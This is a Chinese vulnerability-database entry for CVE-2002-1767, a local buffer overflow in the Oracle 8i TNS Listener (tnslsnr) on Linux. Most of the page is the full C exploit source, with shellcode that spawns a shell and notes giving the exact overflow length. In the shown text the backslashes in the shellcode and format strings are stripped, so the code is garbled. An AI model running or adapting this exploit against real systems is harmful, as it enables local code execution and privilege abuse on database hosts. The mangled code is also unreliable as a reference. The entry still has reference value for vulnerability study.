Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞

Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞

漏洞ID 1106659 漏洞类型 缓冲区溢出
发布时间 2002-04-01 更新时间 2005-10-20
图片[1]-Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-1767
图片[2]-Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-086
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21362
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-086
|漏洞详情
基于Linux的Oracle8iDatabaseServer8.1.5版本中tnslsnr存在缓冲区溢出漏洞。本地用户作为数据库使用者借助超长命令行参数执行任意代码。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/4413/info

Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems.

A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'.

Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable. 
*/

/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail [email protected] if you wish to participate in vuln research. 
 *
 * - The Itch
 * - [email protected]
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more then 2132 bytes into the
 *     buffer at the command line 2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more then 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the  at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133


/* Shellcode made by r0z ([email protected]) */
char shellcode[] =
         "x31xdb"              /* xor   %ebx, %ebx     */
         "x31xc9"              /* xor   %ecx, %ecx     */
         "xf7xe3"              /* mul   %ebx           */
         "xb0x46"              /* mov   $0x46, %al     */
         "x66xbbx03x02"      /* mov   $0x1fc, %bx    */
         "x49"                  /* dec   %ecx           */
         "xcdx80"              /* int   $0x80          */
         "x31xd2"              /* xor   %edx, %edx     */
         "x52"                  /* push  %edx           */
         "x68x6ex2fx73x68"  /* push  $0x68732f6e    */
         "x68x2fx2fx62x69"  /* push  $0x69622f2f    */
         "x89xe3"              /* mov   %esp, %ebx     */
         "x52"                  /* push  %edx           */
         "x53"                  /* push  %ebx           */
         "x89xe1"              /* mov   %esp, %ecx     */
         "x6ax0b"              /* pushl $0xb           */
         "x58"                  /* pop   %eax           */
         "xcdx80";             /* int   $0x80          */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytesn", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytesn", eggsize);
                exit(1);
        }

        printf("Oracle tnslsrn 8.1.5n");
        printf("Vulnerability found by KF / http://www.snosoft.comn");
        printf("Coded by The Itch / http://www.promisc.orgnn");
        printf("Using return address: 0x%xn", get_sp);
        printf("Using buffersize    : %dn", bsize - 1);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        buff[bsize - 1 ]= '';
        execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
              "tnslsnr", buff, 0);
        return 0;
}
|参考资料

来源:XF
名称:oracle-tnslsnr-command-line-bo(8772)
链接:http://xforce.iss.net/xforce/xfdb/8772
来源:BID
名称:4413
链接:http://www.securityfocus.com/bid/4413

相关推荐: Check Point Firewall-1 LDAP Authentication Vulnerability

Check Point Firewall-1 LDAP Authentication Vulnerability 漏洞ID 1104478 漏洞类型 Access Validation Error 发布时间 1999-10-20 更新时间 1999-10-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享